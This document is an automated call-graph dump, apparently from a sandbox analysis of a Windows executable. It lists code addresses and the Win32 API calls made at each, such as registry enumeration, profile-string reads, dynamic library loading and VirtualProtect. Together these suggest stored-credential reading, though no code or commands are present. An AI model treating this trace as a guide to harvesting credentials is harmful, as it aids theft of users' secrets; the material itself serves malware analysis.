33299->33256 33300->33279 33303 40d0f9 GetMessageA 33304 40d17b 33303->33304 33305 40d10d 33303->33305 33304->33277 33306 40d113 TranslateAccelerator 33305->33306 33308 40d145 IsDialogMessage 33305->33308 33309 40d139 IsDialogMessage 33305->33309 33306->33305 33307 40d16d GetMessageA 33306->33307 33307->33304 33307->33306 33308->33307 33310 40d157 TranslateMessage DispatchMessageA 33308->33310 33309->33307 33309->33308 33310->33307 33312 404ac4 GetProcAddress 33311->33312 33315 404ae8 33311->33315 33313 404ad4 33312->33313 33314 404add FreeLibrary 33312->33314 33313->33314 33314->33315 33316 404b13 33315->33316 33317 404afc MessageBoxA 33315->33317 33316->33262 33317->33262 33319 410d17 LoadLibraryA 33318->33319 33320 410d3c 33318->33320 33319->33320 33321 410d2b GetProcAddress 33319->33321 33320->33264 33321->33320 33323 40cd08 ??2@YAPAXI 33322->33323 33325 40cd26 33323->33325 33326 40cd2d 33323->33326 33393 404025 6 API calls 33325->33393 33328 40cd66 33326->33328 33329 40cd59 DeleteObject 33326->33329 33386 407088 33328->33386 33329->33328 33331 40cd6b 33389 4019b5 33331->33389 33334 4019b5 strncat 33335 40cdbf _mbscpy 33334->33335 33335->33266 33395 407948 ??3@YAXPAX ??3@YAXPAX 33336->33395 33338 407e04 33396 407a55 33338->33396 33341 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33348 407cf7 33341->33348 33342 407ddc 33342->33338 33408 407a1f 33342->33408 33344 407d7a ??3@YAXPAX 33344->33348 33348->33338 33348->33341 33348->33342 33348->33344 33399 40796e 7 API calls 33348->33399 33400 406f30 33348->33400 33350 407e30 33351 407e57 33350->33351 33352 407e38 33350->33352 33351->33271 33351->33272 33352->33351 33353 407e41 _strcmpi 33352->33353 33353->33351 33353->33352 33414 4097ff 33354->33414 33356 409854 33419 409731 33356->33419 33360 4097ff 3 API calls 33359->33360 33361 409723 33360->33361 33439 40966c 33361->33439 33453 4023b2 33364->33453 33370 40ced3 33542 40cdda 7 API calls 33370->33542 33371 40cece 33374 40cf3f 33371->33374 33494 40c3d0 memset 
GetModuleFileNameA strrchr 33371->33494 33374->33296 33374->33297 33377 40ceed 33521 40affa 33377->33521 33381->33293 33382->33303 33383->33285 33384->33291 33385->33299 33394 406fc7 memset _mbscpy 33386->33394 33388 40709f CreateFontIndirectA 33388->33331 33390 4019e1 33389->33390 33391 4019c2 strncat 33390->33391 33392 4019e5 memset LoadIconA 33390->33392 33391->33390 33392->33334 33393->33326 33394->33388 33395->33348 33397 407a65 33396->33397 33398 407a5b ??3@YAXPAX 33396->33398 33397->33350 33398->33397 33399->33348 33401 406f37 malloc 33400->33401 33402 406f7d 33400->33402 33404 406f73 33401->33404 33405 406f58 33401->33405 33402->33348 33404->33348 33406 406f6c ??3@YAXPAX 33405->33406 33407 406f5c memcpy 33405->33407 33406->33404 33407->33406 33409 407a38 33408->33409 33410 407a2d ??3@YAXPAX 33408->33410 33412 406f30 3 API calls 33409->33412 33411 407a43 33410->33411 33413 40796e 7 API calls 33411->33413 33412->33411 33413->33338 33430 406f96 GetModuleFileNameA 33414->33430 33416 409805 strrchr 33417 409814 33416->33417 33418 409817 _mbscat 33416->33418 33417->33418 33418->33356 33431 44b090 33419->33431 33424 40930c 3 API calls 33425 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33424->33425 33426 4097c5 LoadStringA 33425->33426 33429 4097db 33426->33429 33428 4097f3 33428->33277 33429->33426 33429->33428 33438 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33429->33438 33430->33416 33432 40973e _mbscpy _mbscpy 33431->33432 33433 40930c 33432->33433 33434 44b090 33433->33434 33435 409319 memset GetPrivateProfileStringA 33434->33435 33436 409374 33435->33436 33437 409364 WritePrivateProfileStringA 33435->33437 33436->33424 33437->33436 33438->33429 33449 406f81 GetFileAttributesA 33439->33449 33441 409675 33442 4096ee 33441->33442 33443 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33441->33443 33442->33278 33450 409278 GetPrivateProfileStringA 33443->33450 33445 4096c9 33451 409278 GetPrivateProfileStringA 33445->33451 
33447 4096da 33452 409278 GetPrivateProfileStringA 33447->33452 33449->33441 33450->33445 33451->33447 33452->33442 33544 409c1c 33453->33544 33456 401e69 memset 33583 410dbb 33456->33583 33459 401ec2 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33459->33613 33460 401ed4 33598 406f81 GetFileAttributesA 33460->33598 33463 401ee6 strlen strlen 33465 401f15 33463->33465 33467 401f28 33463->33467 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33465->33614 33599 406f81 GetFileAttributesA 33467->33599 33469 401f35 33600 401c31 33469->33600 33472 401f75 33612 410a9c RegOpenKeyExA 33472->33612 33474 401c31 7 API calls 33474->33472 33475 401f91 33476 402187 33475->33476 33477 401f9c memset 33475->33477 33479 402195 ExpandEnvironmentStringsA 33476->33479 33480 4021a8 _strcmpi 33476->33480 33615 410b62 RegEnumKeyExA 33477->33615 33624 406f81 GetFileAttributesA 33479->33624 33480->33370 33480->33371 33482 40217e RegCloseKey 33482->33476 33483 401fd9 atoi 33484 401fef memset memset sprintf 33483->33484 33492 401fc9 33483->33492 33616 410b1e 33484->33616 33487 402165 33487->33482 33488 406f81 GetFileAttributesA 33488->33492 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33482 33492->33483 33492->33487 33492->33488 33492->33489 33492->33490 33492->33491 33493 402167 _mbscpy 33492->33493 33623 410b62 RegEnumKeyExA 33492->33623 33493->33482 33495 40c422 33494->33495 33496 40c425 _mbscat _mbscpy _mbscpy 33494->33496 33495->33496 33497 40c49d 33496->33497 33498 40c512 33497->33498 33499 40c502 GetWindowPlacement 33497->33499 33500 40c538 33498->33500 33645 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33498->33645 33499->33498 33638 409b31 33500->33638 33504 40ba28 33505 40ba87 33504->33505 33511 40ba3c 33504->33511 33648 406c62 LoadCursorA SetCursor 33505->33648 33507 40ba43 _mbsicmp 33507->33511 33508 40ba8c 33649 410a9c RegOpenKeyExA 33508->33649 33650 404785 
33508->33650 33653 403c16 33508->33653 33729 4107f1 33508->33729 33732 404734 33508->33732 33509 40baa0 33510 407e30 _strcmpi 33509->33510 33514 40bab0 33510->33514 33511->33505 33511->33507 33740 40b5e5 10 API calls 33511->33740 33512 40bafa SetCursor 33512->33377 33514->33512 33515 40baf1 qsort 33514->33515 33515->33512 34101 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33521->34101 33523 40b00e 33524 40b016 33523->33524 33525 40b01f GetStdHandle 33523->33525 34102 406d1a CreateFileA 33524->34102 33527 40b01c 33525->33527 33528 40b035 33527->33528 33529 40b12d 33527->33529 34103 406c62 LoadCursorA SetCursor 33528->34103 34107 406d77 9 API calls 33529->34107 33532 40b136 33543 40c580 28 API calls 33532->33543 33533 40b042 33535 40b087 33533->33535 33540 40b0a1 33533->33540 34104 40a57c strlen WriteFile 33533->34104 33535->33540 34105 40a699 12 API calls 33535->34105 33537 40b0d6 33538 40b116 CloseHandle 33537->33538 33539 40b11f SetCursor 33537->33539 33538->33539 33539->33532 33540->33537 34106 406d77 9 API calls 33540->34106 33542->33371 33543->33374 33556 409a32 33544->33556 33547 409c80 memcpy memcpy 33548 409cda 33547->33548 33548->33547 33549 409d18 ??2@YAPAXI ??2@YAPAXI 33548->33549 33553 408db6 12 API calls 33548->33553 33550 409d54 ??2@YAPAXI 33549->33550 33552 409d8b 33549->33552 33550->33552 33566 409b9c 33552->33566 33553->33548 33555 4023c1 33555->33456 33557 409a44 33556->33557 33558 409a3d ??3@YAXPAX 33556->33558 33559 409a52 33557->33559 33560 409a4b ??3@YAXPAX 33557->33560 33558->33557 33561 409a63 33559->33561 33562 409a5c ??3@YAXPAX 33559->33562 33560->33559 33563 409a83 ??2@YAPAXI ??2@YAPAXI 33561->33563 33564 409a73 ??3@YAXPAX 33561->33564 33565 409a7c ??3@YAXPAX 33561->33565 33562->33561 33563->33547 33564->33565 33565->33563 33567 407a55 ??3@YAXPAX 33566->33567 33568 409ba5 33567->33568 33569 407a55 ??3@YAXPAX 33568->33569 33570 409bad 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bb5 33571->33572 33573 407a55 ??3@YAXPAX 
33572->33573 33574 409bbd 33573->33574 33575 407a1f 4 API calls 33574->33575 33576 409bd0 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bda 33577->33578 33579 407a1f 4 API calls 33578->33579 33580 409be4 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409bee 33581->33582 33582->33555 33584 410d0e 2 API calls 33583->33584 33585 410dca 33584->33585 33586 410dfd memset 33585->33586 33625 4070ae 33585->33625 33587 410e1d 33586->33587 33628 410a9c RegOpenKeyExA 33587->33628 33590 401e9e strlen strlen 33590->33459 33590->33460 33592 410e4a 33593 410e7f _mbscpy 33592->33593 33629 410d3d _mbscpy 33592->33629 33593->33590 33595 410e5b 33630 410add RegQueryValueExA 33595->33630 33597 410e73 RegCloseKey 33597->33593 33598->33463 33599->33469 33631 410a9c RegOpenKeyExA 33600->33631 33602 401c4c 33603 401cad 33602->33603 33632 410add RegQueryValueExA 33602->33632 33603->33472 33603->33474 33605 401c6a 33606 401c71 strchr 33605->33606 33607 401ca4 RegCloseKey 33605->33607 33606->33607 33608 401c85 strchr 33606->33608 33607->33603 33608->33607 33609 401c94 33608->33609 33633 406f06 strlen 33609->33633 33611 401ca1 33611->33607 33612->33475 33613->33460 33614->33467 33615->33492 33636 410a9c RegOpenKeyExA 33616->33636 33618 410b34 33619 410b5d 33618->33619 33637 410add RegQueryValueExA 33618->33637 33619->33492 33621 410b4c RegCloseKey 33621->33619 33623->33492 33624->33480 33626 4070bd GetVersionExA 33625->33626 33627 4070ce 33625->33627 33626->33627 33627->33586 33627->33590 33628->33592 33629->33595 33630->33597 33631->33602 33632->33605 33634 406f17 33633->33634 33635 406f1a memcpy 33633->33635 33634->33635 33635->33611 33636->33618 33637->33621 33639 409b40 33638->33639 33641 409b4e 33638->33641 33646 409901 memset SendMessageA 33639->33646 33642 409b99 33641->33642 33643 409b8b 33641->33643 33642->33504 33647 409868 SendMessageA 33643->33647 33645->33500 33646->33641 33647->33642 33648->33508 33649->33509 33651 4047a3 33650->33651 33652 404799 
FreeLibrary 33650->33652 33651->33509 33652->33651 33654 4107f1 FreeLibrary 33653->33654 33655 403c30 LoadLibraryA 33654->33655 33656 403c74 33655->33656 33657 403c44 GetProcAddress 33655->33657 33658 4107f1 FreeLibrary 33656->33658 33657->33656 33659 403c5e 33657->33659 33660 403c7b 33658->33660 33659->33656 33662 403c6b 33659->33662 33661 404734 3 API calls 33660->33661 33663 403c86 33661->33663 33662->33660 33741 4036e5 33663->33741 33666 4036e5 26 API calls 33667 403c9a 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403ca4 33668->33669 33670 4036e5 26 API calls 33669->33670 33671 403cae 33670->33671 33753 4085d2 33671->33753 33679 403ce5 33680 403cf7 33679->33680 33934 402bd1 39 API calls 33679->33934 33799 410a9c RegOpenKeyExA 33680->33799 33683 403d0a 33684 403d1c 33683->33684 33935 402bd1 39 API calls 33683->33935 33800 402c5d 33684->33800 33688 4070ae GetVersionExA 33689 403d31 33688->33689 33818 410a9c RegOpenKeyExA 33689->33818 33691 403d51 33692 403d61 33691->33692 33936 402b22 46 API calls 33691->33936 33819 410a9c RegOpenKeyExA 33692->33819 33695 403d87 33696 403d97 33695->33696 33937 402b22 46 API calls 33695->33937 33820 410a9c RegOpenKeyExA 33696->33820 33699 403dbd 33700 403dcd 33699->33700 33938 402b22 46 API calls 33699->33938 33821 410808 33700->33821 33704 404785 FreeLibrary 33705 403de8 33704->33705 33825 402fdb 33705->33825 33708 402fdb 34 API calls 33709 403e00 33708->33709 33841 4032b7 33709->33841 33718 403e3b 33720 403e73 33718->33720 33721 403e46 _mbscpy 33718->33721 33888 40fb00 33720->33888 33940 40f334 334 API calls 33721->33940 33730 410807 33729->33730 33731 4107fc FreeLibrary 33729->33731 33730->33509 33731->33730 33733 404785 FreeLibrary 33732->33733 33734 40473b LoadLibraryA 33733->33734 33735 40474c GetProcAddress 33734->33735 33738 40476e 33734->33738 33736 404764 33735->33736 33735->33738 33736->33738 33737 404781 33737->33509 33738->33737 33739 404785 FreeLibrary 33738->33739 33739->33737 33740->33511 33742 4037c5 
33741->33742 33743 4036fb 33741->33743 33742->33666 33941 410863 UuidFromStringA UuidFromStringA memcpy 33743->33941 33745 40370e 33745->33742 33746 403716 strchr 33745->33746 33746->33742 33747 403730 33746->33747 33942 4021b6 memset 33747->33942 33749 40373f _mbscpy _mbscpy strlen 33750 4037a4 _mbscpy 33749->33750 33751 403789 sprintf 33749->33751 33943 4023e5 16 API calls 33750->33943 33751->33750 33754 4085e2 33753->33754 33944 4082cd 11 API calls 33754->33944 33758 408600 33759 403cba 33758->33759 33760 40860b memset 33758->33760 33771 40821d 33759->33771 33947 410b62 RegEnumKeyExA 33760->33947 33762 4086d2 RegCloseKey 33762->33759 33764 408637 33764->33762 33765 40865c memset 33764->33765 33948 410a9c RegOpenKeyExA 33764->33948 33951 410b62 RegEnumKeyExA 33764->33951 33949 410add RegQueryValueExA 33765->33949 33768 408694 33950 40848b 10 API calls 33768->33950 33770 4086ab RegCloseKey 33770->33764 33952 410a9c RegOpenKeyExA 33771->33952 33773 40823f 33774 403cc6 33773->33774 33775 408246 memset 33773->33775 33783 4086e0 33774->33783 33953 410b62 RegEnumKeyExA 33775->33953 33777 4082bf RegCloseKey 33777->33774 33779 40826f 33779->33777 33954 410a9c RegOpenKeyExA 33779->33954 33955 4080ed 11 API calls 33779->33955 33956 410b62 RegEnumKeyExA 33779->33956 33782 4082a2 RegCloseKey 33782->33779 33957 4045db 33783->33957 33785 4088ef 33965 404656 33785->33965 33789 408737 wcslen 33789->33785 33795 40876a 33789->33795 33790 40877a _wcsncoll 33790->33795 33792 404734 3 API calls 33792->33795 33793 404785 FreeLibrary 33793->33795 33794 408812 memset 33794->33795 33796 40883c memcpy wcschr 33794->33796 33795->33785 33795->33790 33795->33792 33795->33793 33795->33794 33795->33796 33797 4088c3 LocalFree 33795->33797 33968 40466b _mbscpy 33795->33968 33796->33795 33797->33795 33798 410a9c RegOpenKeyExA 33798->33679 33799->33683 33969 410a9c RegOpenKeyExA 33800->33969 33802 402c7a 33803 402da5 33802->33803 33804 402c87 memset 33802->33804 33803->33688 33970 410b62 
RegEnumKeyExA 33804->33970 33806 402d9c RegCloseKey 33806->33803 33807 402cb2 33807->33806 33808 410b1e 3 API calls 33807->33808 33817 402d9a 33807->33817 33974 402bd1 39 API calls 33807->33974 33975 410b62 RegEnumKeyExA 33807->33975 33809 402ce4 memset sprintf 33808->33809 33971 410a9c RegOpenKeyExA 33809->33971 33811 402d28 33812 402d3a sprintf 33811->33812 33972 402bd1 39 API calls 33811->33972 33973 410a9c RegOpenKeyExA 33812->33973 33817->33806 33818->33691 33819->33695 33820->33699 33822 410816 33821->33822 33823 4107f1 FreeLibrary 33822->33823 33824 403ddd 33823->33824 33824->33704 33976 410a9c RegOpenKeyExA 33825->33976 33827 402ff9 33828 403006 memset 33827->33828 33829 40312c 33827->33829 33977 410b62 RegEnumKeyExA 33828->33977 33829->33708 33831 403122 RegCloseKey 33831->33829 33832 410b1e 3 API calls 33833 403058 memset sprintf 33832->33833 33978 410a9c RegOpenKeyExA 33833->33978 33835 4030a2 memset 33979 410b62 RegEnumKeyExA 33835->33979 33836 410b62 RegEnumKeyExA 33840 403033 33836->33840 33838 4030f9 RegCloseKey 33838->33840 33840->33831 33840->33832 33840->33835 33840->33836 33840->33838 33980 402db3 26 API calls 33840->33980 33842 4032d5 33841->33842 33843 4033a9 33841->33843 33981 4021b6 memset 33842->33981 33856 4034e4 memset memset 33843->33856 33845 4032e1 33982 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33845->33982 33847 4032ea 33848 4032f8 memset GetPrivateProfileSectionA 33847->33848 33983 4023e5 16 API calls 33847->33983 33848->33843 33853 40332f 33848->33853 33850 40339b strlen 33850->33843 33850->33853 33852 403350 strchr 33852->33853 33853->33843 33853->33850 33984 4021b6 memset 33853->33984 33985 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33853->33985 33986 4023e5 16 API calls 33853->33986 33857 410b1e 3 API calls 33856->33857 33858 40353f 33857->33858 33859 40357f 33858->33859 33860 403546 _mbscpy 33858->33860 33864 403985 33859->33864 33987 406d55 strlen _mbscat 33860->33987 33862 403565 _mbscat 
33988 4033f0 19 API calls 33862->33988 33989 40466b _mbscpy 33864->33989 33868 4039aa 33870 4039ff 33868->33870 33990 40f460 memset memset 33868->33990 34011 40f6e2 33868->34011 34027 4038e8 21 API calls 33868->34027 33871 404785 FreeLibrary 33870->33871 33872 403a0b 33871->33872 33873 4037ca memset memset 33872->33873 34035 444551 memset 33873->34035 33875 4038e2 33875->33718 33939 40f334 334 API calls 33875->33939 33878 40382e 33879 406f06 2 API calls 33878->33879 33880 403843 33879->33880 33881 406f06 2 API calls 33880->33881 33882 403855 strchr 33881->33882 33883 403884 _mbscpy 33882->33883 33884 403897 strlen 33882->33884 33885 4038bf _mbscpy 33883->33885 33884->33885 33886 4038a4 sprintf 33884->33886 34047 4023e5 16 API calls 33885->34047 33886->33885 33889 44b090 33888->33889 33890 40fb10 RegOpenKeyExA 33889->33890 33891 403e7f 33890->33891 33892 40fb3b RegOpenKeyExA 33890->33892 33902 40f96c 33891->33902 33893 40fb55 RegQueryValueExA 33892->33893 33894 40fc2d RegCloseKey 33892->33894 33895 40fc23 RegCloseKey 33893->33895 33896 40fb84 33893->33896 33894->33891 33895->33894 33897 404734 3 API calls 33896->33897 33898 40fb91 33897->33898 33898->33895 33899 40fc19 LocalFree 33898->33899 33900 40fbdd memcpy memcpy 33898->33900 33899->33895 34052 40f802 11 API calls 33900->34052 33903 4070ae GetVersionExA 33902->33903 33904 40f98d 33903->33904 33905 4045db 7 API calls 33904->33905 33913 40f9a9 33905->33913 33906 40fae6 33907 404656 FreeLibrary 33906->33907 33908 403e85 33907->33908 33914 4442ea memset 33908->33914 33909 40fa13 memset WideCharToMultiByte 33910 40fa43 _strnicmp 33909->33910 33909->33913 33911 40fa5b WideCharToMultiByte 33910->33911 33910->33913 33912 40fa88 WideCharToMultiByte 33911->33912 33911->33913 33912->33913 33913->33906 33913->33909 33915 410dbb 9 API calls 33914->33915 33916 444329 33915->33916 34053 40759e strlen strlen 33916->34053 33921 410dbb 9 API calls 33922 444350 33921->33922 33923 40759e 3 API calls 33922->33923 33924 44435a 
33923->33924 33925 444212 65 API calls 33924->33925 33926 444366 memset memset 33925->33926 33927 410b1e 3 API calls 33926->33927 33928 4443b9 ExpandEnvironmentStringsA strlen 33927->33928 33929 4443f4 _strcmpi 33928->33929 33930 4443e5 33928->33930 33931 403e91 33929->33931 33932 44440c 33929->33932 33930->33929 33931->33509 33933 444212 65 API calls 33932->33933 33933->33931 33934->33680 33935->33684 33936->33692 33937->33696 33938->33700 33939->33718 33940->33720 33941->33745 33942->33749 33943->33742 33945 40841c 33944->33945 33946 410a9c RegOpenKeyExA 33945->33946 33946->33758 33947->33764 33948->33764 33949->33768 33950->33770 33951->33764 33952->33773 33953->33779 33954->33779 33955->33782 33956->33779 33958 404656 FreeLibrary 33957->33958 33959 4045e3 LoadLibraryA 33958->33959 33960 404651 33959->33960 33961 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33959->33961 33960->33785 33960->33789 33962 40463d 33961->33962 33963 404643 33962->33963 33964 404656 FreeLibrary 33962->33964 33963->33960 33964->33960 33966 403cd2 33965->33966 33967 40465c FreeLibrary 33965->33967 33966->33798 33967->33966 33968->33795 33969->33802 33970->33807 33971->33811 33972->33812 33973->33807 33974->33807 33975->33807 33976->33827 33977->33840 33978->33840 33979->33840 33980->33840 33981->33845 33982->33847 33983->33848 33984->33852 33985->33853 33986->33853 33987->33862 33988->33859 33989->33868 34028 4078ba 33990->34028 33993 4078ba _mbsnbcat 33994 40f5a3 RegOpenKeyExA 33993->33994 33995 40f5c3 RegQueryValueExA 33994->33995 33996 40f6d9 33994->33996 33997 40f6d0 RegCloseKey 33995->33997 33998 40f5f0 33995->33998 33996->33868 33997->33996 33998->33997 33999 40f675 33998->33999 34032 40466b _mbscpy 33998->34032 33999->33997 34033 4012ee strlen 33999->34033 34001 40f611 34003 404734 3 API calls 34001->34003 34008 40f616 34003->34008 34004 40f69e RegQueryValueExA 34004->33997 34005 40f6c1 34004->34005 34005->33997 34006 40f66a 34007 404785 
FreeLibrary 34006->34007 34007->33999 34008->34006 34009 40f661 LocalFree 34008->34009 34010 40f645 memcpy 34008->34010 34009->34006 34010->34009 34034 40466b _mbscpy 34011->34034 34013 40f6fa 34014 4045db 7 API calls 34013->34014 34015 40f708 34014->34015 34016 404734 3 API calls 34015->34016 34021 40f7e2 34015->34021 34022 40f715 34016->34022 34017 404656 FreeLibrary 34018 40f7f1 34017->34018 34019 404785 FreeLibrary 34018->34019 34020 40f7fc 34019->34020 34020->33868 34021->34017 34022->34021 34023 40f797 WideCharToMultiByte 34022->34023 34024 40f7b8 strlen 34023->34024 34025 40f7d9 LocalFree 34023->34025 34024->34025 34026 40f7c8 _mbscpy 34024->34026 34025->34021 34026->34025 34027->33868 34029 4078e6 34028->34029 34030 4078c7 _mbsnbcat 34029->34030 34031 4078ea 34029->34031 34030->34029 34031->33993 34032->34001 34033->34004 34034->34013 34048 410a9c RegOpenKeyExA 34035->34048 34037 40381a 34037->33875 34046 4021b6 memset 34037->34046 34038 44458b 34038->34037 34049 410add RegQueryValueExA 34038->34049 34040 4445a4 34041 4445dc RegCloseKey 34040->34041 34050 410add RegQueryValueExA 34040->34050 34041->34037 34043 4445c1 34043->34041 34051 444879 30 API calls 34043->34051 34045 4445da 34045->34041 34046->33878 34047->33875 34048->34038 34049->34040 34050->34043 34051->34045 34052->33899 34054 4075c9 34053->34054 34055 4075bb _mbscat 34053->34055 34056 444212 34054->34056 34055->34054 34073 407e9d 34056->34073 34059 44424d 34060 444274 34059->34060 34061 444258 34059->34061 34081 407ef8 34059->34081 34062 407e9d 9 API calls 34060->34062 34098 444196 52 API calls 34061->34098 34069 4442a0 34062->34069 34064 407ef8 9 API calls 34064->34069 34065 4442ce 34095 407f90 34065->34095 34069->34064 34069->34065 34071 444212 65 API calls 34069->34071 34091 407e62 34069->34091 34070 407f90 FindClose 34072 4442e4 34070->34072 34071->34069 34072->33921 34074 407f90 FindClose 34073->34074 34075 407eaa 34074->34075 34076 406f06 2 API calls 34075->34076 34077 407ebd strlen 
strlen 34076->34077 34078 407ee1 34077->34078 34079 407eea 34077->34079 34099 4070e3 strlen _mbscat _mbscpy _mbscat 34078->34099 34079->34059 34082 407f03 FindFirstFileA 34081->34082 34083 407f24 FindNextFileA 34081->34083 34084 407f3f 34082->34084 34085 407f46 strlen strlen 34083->34085 34086 407f3a 34083->34086 34084->34085 34088 407f7f 34084->34088 34085->34088 34089 407f76 34085->34089 34087 407f90 FindClose 34086->34087 34087->34084 34088->34059 34100 4070e3 strlen _mbscat _mbscpy _mbscat 34089->34100 34092 407e6c strcmp 34091->34092 34094 407e94 34091->34094 34093 407e83 strcmp 34092->34093 34092->34094 34093->34094 34094->34069 34096 407fa3 34095->34096 34097 407f99 FindClose 34095->34097 34096->34070 34097->34096 34098->34059 34099->34079 34100->34088 34101->33523 34102->33527 34103->33533 34104->33535 34105->33540 34106->33537 34107->33532 34116 411853 RtlInitializeCriticalSection memset 34117 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34290 40a256 13 API calls 34292 432e5b 17 API calls 34294 43fa5a 20 API calls 34119 401060 41 API calls 34297 427260 CloseHandle memset memset 33197 410c68 FindResourceA 33198 410c81 SizeofResource 33197->33198 33200 410cae 33197->33200 33199 410c92 LoadResource 33198->33199 33198->33200 33199->33200 33201 410ca0 LockResource 33199->33201 33201->33200 34299 405e69 14 API calls 34124 433068 15 API calls __fprintf_l 34301 414a6d 18 API calls 34302 43fe6f 134 API calls 34126 424c6d 15 API calls __fprintf_l 34303 426741 19 API calls 34128 440c70 17 API calls 34129 443c71 44 API calls 34132 427c79 24 API calls 34306 416e7e memset __fprintf_l 34136 42800b 47 API calls 34137 425115 85 API calls __fprintf_l 34309 41960c 61 API calls 34138 43f40c 122 API calls __fprintf_l 34141 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34142 43f81a 20 API calls 34144 414c20 memset memset 34145 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34313 414625 18 API calls 34314 
404225 modf 34315 403a26 strlen WriteFile 34317 40422a 12 API calls 34321 427632 memset memset memcpy 34322 40ca30 59 API calls 34323 404235 26 API calls 34146 42ec34 61 API calls __fprintf_l 34147 425115 76 API calls __fprintf_l 34324 425115 77 API calls __fprintf_l 34326 44223a 38 API calls 34153 43183c 112 API calls 34327 44b2c5 _onexit __dllonexit 34332 42a6d2 memcpy __allrem 34155 405cda 65 API calls 34340 43fedc 138 API calls 34341 4116e1 16 API calls __fprintf_l 34158 4244e6 19 API calls 34160 42e8e8 127 API calls __fprintf_l 34161 4118ee RtlLeaveCriticalSection 34346 43f6ec 22 API calls 34163 425115 119 API calls __fprintf_l 33187 410cf3 EnumResourceNamesA 34349 4492f0 memcpy memcpy 34351 43fafa 18 API calls 34353 4342f9 15 API calls __fprintf_l 34164 4144fd 19 API calls 34355 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34356 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34359 443a84 _mbscpy 34361 43f681 17 API calls 34167 404487 22 API calls 34363 415e8c 16 API calls __fprintf_l 34171 411893 RtlDeleteCriticalSection __fprintf_l 34172 41a492 42 API calls 34367 403e96 34 API calls 34368 410e98 memset SHGetPathFromIDList SendMessageA 34174 426741 109 API calls __fprintf_l 34175 4344a2 18 API calls 34176 4094a2 10 API calls 34371 4116a6 15 API calls __fprintf_l 34372 43f6a4 17 API calls 34373 440aa3 20 API calls 34375 427430 45 API calls 34179 4090b0 7 API calls 34180 4148b0 15 API calls 34182 4118b4 RtlEnterCriticalSection 34183 4014b7 CreateWindowExA 34184 40c8b8 19 API calls 34186 4118bf RtlTryEnterCriticalSection 34380 42434a 18 API calls __fprintf_l 34382 405f53 12 API calls 34194 43f956 59 API calls 34196 40955a 17 API calls 34197 428561 36 API calls 34198 409164 7 API calls 34386 404366 19 API calls 34390 40176c ExitProcess 34393 410777 42 API calls 34203 40dd7b 51 API calls 34204 425d7c 16 API calls __fprintf_l 34395 43f6f0 25 API calls 34396 42db01 22 API calls 34205 412905 15 API calls __fprintf_l 34397 403b04 
54 API calls 34398 405f04 SetDlgItemTextA GetDlgItemTextA 34399 44b301 ??3@YAXPAX 34402 4120ea 14 API calls 3 library calls 34403 40bb0a 8 API calls 34405 413f11 strcmp 34209 434110 17 API calls __fprintf_l 34212 425115 108 API calls __fprintf_l 34406 444b11 _onexit 34214 425115 76 API calls __fprintf_l 34217 429d19 10 API calls 34409 444b1f __dllonexit 34410 409f20 _strcmpi 34219 42b927 31 API calls 34413 433f26 19 API calls __fprintf_l 34414 44b323 FreeLibrary 34415 427f25 46 API calls 34416 43ff2b 17 API calls 34417 43fb30 19 API calls 34226 414d36 16 API calls 34228 40ad38 7 API calls 34419 433b38 16 API calls __fprintf_l 34420 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34232 426741 21 API calls 34233 40c5c3 125 API calls 34235 43fdc5 17 API calls 34421 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34238 4161cb memcpy memcpy memcpy memcpy 33202 44b3cf 33203 44b3e6 33202->33203 33205 44b454 33202->33205 33203->33205 33209 44b40e 33203->33209 33206 44b405 33206->33205 33207 44b435 VirtualProtect 33206->33207 33207->33205 33208 44b444 VirtualProtect 33207->33208 33208->33205 33210 44b413 33209->33210 33212 44b454 33210->33212 33216 44b42b 33210->33216 33213 44b41c 33213->33212 33214 44b435 VirtualProtect 33213->33214 33214->33212 33215 44b444 VirtualProtect 33214->33215 33215->33212 33217 44b431 33216->33217 33218 44b435 VirtualProtect 33217->33218 33220 44b454 33217->33220 33219 44b444 VirtualProtect 33218->33219 33218->33220 33219->33220 34426 43ffc8 18 API calls 34239 4281cc 15 API calls __fprintf_l 34428 4383cc 110 API calls __fprintf_l 34240 4275d3 41 API calls 34429 4153d3 22 API calls __fprintf_l 34241 444dd7 _XcptFilter 34434 4013de 15 API calls 34436 425115 111 API calls __fprintf_l 34437 43f7db 18 API calls 34440 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34243 4335ee 16 API calls __fprintf_l 34442 429fef 11 API calls 34244 444deb _exit _c_exit 34443 40bbf0 138 API calls 34247 425115 79 API calls __fprintf_l 34447 
